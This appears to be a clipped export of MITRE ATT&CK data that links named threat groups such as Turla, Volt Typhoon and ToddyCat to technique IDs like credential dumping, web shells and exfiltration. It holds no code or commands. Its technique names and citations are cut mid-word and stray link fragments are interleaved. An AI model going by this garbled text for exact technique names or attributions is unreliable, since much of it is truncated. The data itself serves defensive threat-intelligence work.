G0027 Threat Grointrusion- group uses T1030 Data Transfattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1005 Data from attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1140 Deobfuscatattack-pat technique During exe
G0027 Threat Grointrusion- group uses T1562.002Disable Wiattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1583.001Domains attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1189 Drive-by C attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1608.004Drive-by T attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1027.013Encrypted/attack-pat technique A [Threat
G0027 Threat Grointrusion- group uses T1567.002Exfiltratio attack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1190 Exploit Pubattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1203 Exploitatioattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1068 Exploitatioattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1210 Exploitatioattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1133 External R attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1070.004File Deleti attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1105 Ingress Tooattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1056.001Keyloggingattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1003.004LSA Secret attack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1003.001LSASS Memattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1087.001Local Acco attack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1074.001Local Data attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1204.002Malicious Fattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1112 Modify Regattack-pat technique A [Threat
G0027 Threat Grointrusion- group uses T1046 Network Seattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1070.005Network Shattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1555.005Password attack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1059.001PowerShellattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1055.012Process Hoattack-pat technique A [Threat G
G0027 Threat Grointrusion- group uses T1012 Query Regiattack-pat technique A [Threat
G0027 Threat Grointrusion- group uses T1547.001Registry Ruattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1074.002Remote Datattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1018 Remote Sysattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1003.002Security A attack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1027.002Software Pattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1566.001Spearphishattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1016 System Netattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1049 System Netattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1033 System Own attack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1588.002Tool attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1199 Trusted Relattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1608.001Upload Maattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1608.002Upload Tooattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1078 Valid Acco attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1071.001Web Protocattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1505.003Web Shell attack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1059.003Windows Cattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1047 Windows M attack-pat technique A [Threat
G0027 Threat Grointrusion- group uses T1021.006Windows Rattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1543.003Windows Se attack-pat technique [Threat Gro
G0076 Thrip intrusion- group uses T1048.003Exfiltrati attack-pat technique [Thrip](htt
G0076 Thrip intrusion- group uses T1059.001PowerShellattack-pat technique [Thrip](ht
G0076 Thrip intrusion- group uses T1219 Remote Accattack-pat technique [Thrip](htt
G0076 Thrip intrusion- group uses T1588.002Tool attack-pat technique [Thrip](htt
G1022 ToddyCat intrusion- group uses T1560.001Archive viaattack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1005 Data from attack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1562.004Disable or attack-pat technique Prior to ex
[ToddyCat](https://attack.mi
G1022 ToddyCat intrusion- group uses T1087.002Domain Acattack-pat technique
G1022 ToddyCat intrusion- group uses T1078.002Domain Acattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1069.002Domain Grattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1567.002Exfiltratio attack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1190 Exploit Pubattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1083 File and Di attack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1564.003Hidden Wi attack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1036.005Match Legiattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1106 Native API attack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1095 Non-Applicattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1059.001PowerShellattack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1057 Process Di attack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1074.002Remote Datattack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1018 Remote Sysattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1021.002SMB/Windo attack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1053.005Scheduled attack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1518.001Security S attack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1566.003Spearphishiattack-pat technique [ToddyCat](
G1022 ToddyCat intrusion- group uses T1082 System Inf attack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1049 System Netattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1059.003Windows Cattack-pat technique [ToddyCat]
G1022 ToddyCat intrusion- group uses T1047 Windows M attack-pat technique [ToddyCat]
G0131 Tonto Tea intrusion- group uses T1574.001DLL Searchattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1203 Exploitatioattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1068 Exploitatioattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1210 Exploitatioattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1090.002External Prattack-pat technique [Tonto Team
G0131 Tonto Tea intrusion- group uses T1105 Ingress Tooattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1056.001Keyloggingattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1069.001Local Grouattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1204.002Malicious Fattack-pat technique [Tonto Team
G0131 Tonto Tea intrusion- group uses T1135 Network Shattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1003 OS Credentattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1059.001PowerShellattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1059.006Python attack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1566.001Spearphishattack-pat technique [Tonto Tea
G0131 Tonto Tea intrusion- group uses T1505.003Web Shell attack-pat technique [Tonto Team
G0134 Transparenintrusion- group uses T1583.001Domains attack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1584.001Domains attack-pat technique [Transpare
G0134 Transparenintrusion- group uses T1189 Drive-by C attack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1608.004Drive-by T attack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1568 Dynamic Reattack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1027.013Encrypted/attack-pat technique [Transpare
G0134 Transparenintrusion- group uses T1203 Exploitatioattack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1564.001Hidden Fileattack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1204.002Malicious Fattack-pat technique [Transpare
G0134 Transparenintrusion- group uses T1204.001Malicious Lattack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1036.005Match Legiattack-pat technique [Transpare
G0134 Transparenintrusion- group uses T1566.001Spearphishattack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1566.002Spearphishattack-pat technique [Transparen
G0134 Transparenintrusion- group uses T1059.005Visual Basiattack-pat technique [Transparen
G0081 Tropic Tro intrusion- group uses T1573.002Asymmetricattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1119 Automatedattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1020 Automatedattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1574.002DLL Side-L attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1071.004DNS attack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1140 Deobfuscatattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1055.001Dynamic-linattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1573 Encrypted attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1027.013Encrypted/attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1052.001Exfiltratio attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1203 Exploitatioattack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1070.004File Deleti attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1083 File and Di attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1564.001Hidden Fileattack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1105 Ingress Tooattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1078.003Local Acco attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1204.002Malicious Fattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1036.005Match Legiattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1106 Native API attack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1046 Network Seattack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1135 Network Shattack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1057 Process Di attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1547.001Registry Ruattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1091 Replicatio attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1518.001Security S attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1518 Software Dattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1566.001Spearphishattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1132.001Standard Eattack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1027.003Steganogr attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1082 System Inf attack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1016 System Netattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1049 System Netattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1033 System Own attack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1221 Template Iattack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1071.001Web Protocattack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1505.003Web Shell attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1059.003Windows Cattack-pat technique [Tropic Tr
G0081 Tropic Tro intrusion- group uses T1543.003Windows Se attack-pat technique [Tropic Tro
G0081 Tropic Tro intrusion- group uses T1547.004Winlogon Hattack-pat technique [Tropic Tr
G0010 Turla intrusion- group uses T1560.001Archive viaattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1102.002Bidirectio attack-pat technique A [Turla](h
G0010 Turla intrusion- group uses T1110 Brute Forc attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1553.006Code Signinattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1027.010Command aOttack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1134.002Create Proattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1213 Data from attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1005 Data from attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1025 Data from attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1140 Deobfuscatattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1562.001Disable or attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1087.002Domain Acattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1069.002Domain Grattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1189 Drive-by C attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1055.001Dynamic-linattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1567.002Exfiltratio attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1068 Exploitatioattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1083 File and Di attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1564.012File/Path Eattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1027.011Fileless St attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1615 Group Poliattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1027.005Indicator attack-pat technique Based on co
G0010 Turla intrusion- group uses T1105 Ingress Tooattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1090.001Internal Prattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1016.001Internet C attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1059.007JavaScript attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1570 Lateral Tooattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1087.001Local Acco attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1078.003Local Acco attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1069.001Local Grouattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1071.003Mail Protocattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1204.001Malicious Lattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1587.001Malware attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1588.001Malware attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1036.005Match Legiattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1112 Modify Regattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1106 Native API attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1201 Password Pattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1120 Peripheral attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1059.001PowerShellattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1546.013PowerShellattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1057 Process Di attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1055 Process Injattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1090 Proxy attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1059.006Python attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1012 Query Regiattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1547.001Registry Ruattack-pat technique A [Turla](
G0010 Turla intrusion- group uses T1018 Remote Sysattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1021.002SMB/Windo attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1518.001Security S attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1584.004Server attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1566.002Spearphishattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1082 System Inf attack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1016 System Netattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1049 System Netattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1007 System Serattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1124 System Timattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1588.002Tool attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1584.003Virtual Pri attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1059.005Visual Basiattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1071.001Web Protocattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1102 Web Servicattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1583.006Web Servicattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1584.006Web Servicattack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1059.003Windows Cattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1555.004Windows Cattack-pat technique [Turla](ht
G0010 Turla intrusion- group uses T1546.003Windows Ma attack-pat technique [Turla](htt
G0010 Turla intrusion- group uses T1547.004Winlogon Hattack-pat technique [Turla](ht
G0123 Volatile Ceintrusion- group uses T1190 Exploit Pubattack-pat technique [Volatile C
G0123 Volatile Ceintrusion- group uses T1105 Ingress Tooattack-pat technique [Volatile C
G0123 Volatile Ceintrusion- group uses T1595.002Vulnerabiliattack-pat technique [Volatile C
G0123 Volatile Ceintrusion- group uses T1505.003Web Shell attack-pat technique [Volatile C
G0123 Volatile Ceintrusion- group uses T1595.003Wordlist S attack-pat technique [Volatile C
[Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1010 Applicatio attack-pat technique
G1017 Volt Typhointrusion- group uses T1560.001Archive viaattack-pat technique [Volt
[Volt Typh
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1584.005Botnet attack-pat technique
G1017 Volt Typhointrusion- group uses T1217 Browser Inattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1070.007Clear Netwattack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1070.001Clear Windattack-pat technique [Volt
[Volt Typhoon](https://attack
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1555 Credential attack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1555.003Credential attack-pat technique
G1017 Volt Typhointrusion- group uses T1074 Data Stageattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1005 Data from attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1006 Direct Vol attack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1087.002Domain Acattack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1078.002Domain Acattack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1069.002Domain Grattack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1589.002Email Addrattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1190 Exploit Pubattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1068 Exploitatioattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1587.004Exploits attack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1133 External R attack-pat technique [Volt
[Volt Typho
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1070.004File Deleti attack-pat technique
G1017 Volt Typhointrusion- group uses T1083 File and Di attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1592 Gather Vic attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1589 Gather Victattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1590 Gather Vic attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1591 Gather Vic attack-pat technique [Volt
[Volt Typh
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1591.004Identify Roattack-pat technique
G1017 Volt Typhointrusion- group uses T1105 Ingress Tooattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1090.001Internal Prattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1016.001Internet C attack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1056.001Keyloggingattack-pat technique [Volt
[Volt Typh
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1003.001LSASS Memattack-pat technique
G1017 Volt Typhointrusion- group uses T1570 Lateral Tooattack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1087.001Local Acco attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1074.001Local Data attack-pat technique [Volt
[Volt Typho
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1069.001Local Grouattack-pat technique
G1017 Volt Typhointrusion- group uses T1654 Log Enumerattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1036.008Masquerade attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1036.005Match Legiattack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1112 Modify Regattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1090.003Multi-hop attack-pat technique [Volt
[Volt Typho
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1003.003NTDS attack-pat technique
G1017 Volt Typhointrusion- group uses T1584.008Network Deattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1590.006Network Seattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1046 Network Seattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1590.004Network T attack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1120 Peripheral attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1069 Permissionattack-pat technique [Volt
[Volt Typho
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1059.001PowerShellattack-pat technique
G1017 Volt Typhointrusion- group uses T1552.004Private Keyattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1057 Process Di attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1090 Proxy attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1012 Query Regiattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1021.001Remote Des attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1018 Remote Sysattack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1596.005Scan Databattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1113 Screen Capattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1593 Search Op attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1594 Search Vic attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1584.004Server attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1518 Software Dattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1027.002Software Pattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1573.001Symmetric attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1218 System Binattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1497.001System Cheattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1082 System Inf attack-pat technique [Volt Typh
G1017 Volt Typhointrusion- group uses T1614 System Locattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1016 System Netattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1049 System Netattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1033 System Own attack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1007 System Serattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1124 System Timattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1588.002Tool attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1059.004Unix Shell attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1552 Unsecuredattack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1078 Valid Acco attack-pat technique [Volt Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1584.003Virtual Pri attack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1588.006Vulnerabiliattack-pat technique [Volt Typho
G1017 Volt Typhointrusion- group uses T1505.003Web Shell attack-pat technique [Volt
[Volt Typh
Typhoon](https://attack
G1017 Volt Typhointrusion- group uses T1059.003Windows Cattack-pat technique
G1017 Volt Typhointrusion- group uses T1047 Windows M attack-pat technique [Volt Typh
G0090 WIRTE intrusion- group uses T1140 Deobfuscatattack-pat technique [WIRTE](ht
G0090 WIRTE intrusion- group uses T1105 Ingress Tooattack-pat technique [WIRTE](ht
G0090 WIRTE intrusion- group uses T1204.002Malicious Fattack-pat technique [WIRTE](ht
G0090 WIRTE intrusion- group uses T1036.005Match Legiattack-pat technique [WIRTE](ht
G0090 WIRTE intrusion- group uses T1571 Non-Standaattack-pat technique [WIRTE](ht
G0090 WIRTE intrusion- group uses T1059.001PowerShellattack-pat technique [WIRTE](htt
G0090 WIRTE intrusion- group uses T1218.010Regsvr32 attack-pat technique [WIRTE](htt
G0090 WIRTE intrusion- group uses T1566.001Spearphishattack-pat technique [WIRTE](ht
G0090 WIRTE intrusion- group uses T1588.002Tool attack-pat technique [WIRTE](htt
G0090 WIRTE intrusion- group uses T1059.005Visual Basiattack-pat technique [WIRTE](htt
G0090 WIRTE intrusion- group uses T1071.001Web Protocattack-pat technique [WIRTE](ht
G0107 Whitefly intrusion- group uses T1059 Command attack-pat
an technique [Whitefly](
G0107 Whitefly intrusion- group uses T1574.001DLL Searchattack-pat technique [Whitefly](
G0107 Whitefly intrusion- group uses T1027.013Encrypted/attack-pat technique [Whitefly](
G0107 Whitefly intrusion- group uses T1068 Exploitatioattack-pat technique [Whitefly]
G0107 Whitefly intrusion- group uses T1105 Ingress Tooattack-pat technique [Whitefly](
G0107 Whitefly intrusion- group uses T1003.001LSASS Memattack-pat technique [Whitefly](
G0107 Whitefly intrusion- group uses T1204.002Malicious Fattack-pat technique [Whitefly](
G0107 Whitefly intrusion- group uses T1036.005Match Legiattack-pat technique [Whitefly]
G0107 Whitefly intrusion- group uses T1588.002Tool attack-pat technique [Whitefly](
G0124 Windigo intrusion- group uses T1059 Command attack-pat
an technique [Windigo](h
G0124 Windigo intrusion- group uses T1005 Data from attack-pat technique [Windigo](h
G0124 Windigo intrusion- group uses T1189 Drive-by C attack-pat technique [Windigo](
G0124 Windigo intrusion- group uses T1083 File and Di attack-pat technique [Windigo](h
G0124 Windigo intrusion- group uses T1090 Proxy attack-pat technique [Windigo](h
G0124 Windigo intrusion- group uses T1518 Software Dattack-pat technique [Windigo](h
G0124 Windigo intrusion- group uses T1082 System Inf attack-pat technique [Windigo](h
G0112 Windshift intrusion- group uses T1189 Drive-by C attack-pat technique [Windshift
G0112 Windshift intrusion- group uses T1105 Ingress Tooattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1036.001Invalid Codattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1204.002Malicious Fattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1204.001Malicious Lattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1036 Masqueradattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1027 Obfuscatedattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1057 Process Di attack-pat technique [Windshift
G0112 Windshift intrusion- group uses T1547.001Registry Ruattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1518.001Security S attack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1518 Software Dattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1566.001Spearphishattack-pat technique [Windshift]
G0112 Windshift intrusion- group uses T1566.002Spearphishattack-pat technique [Windshift]
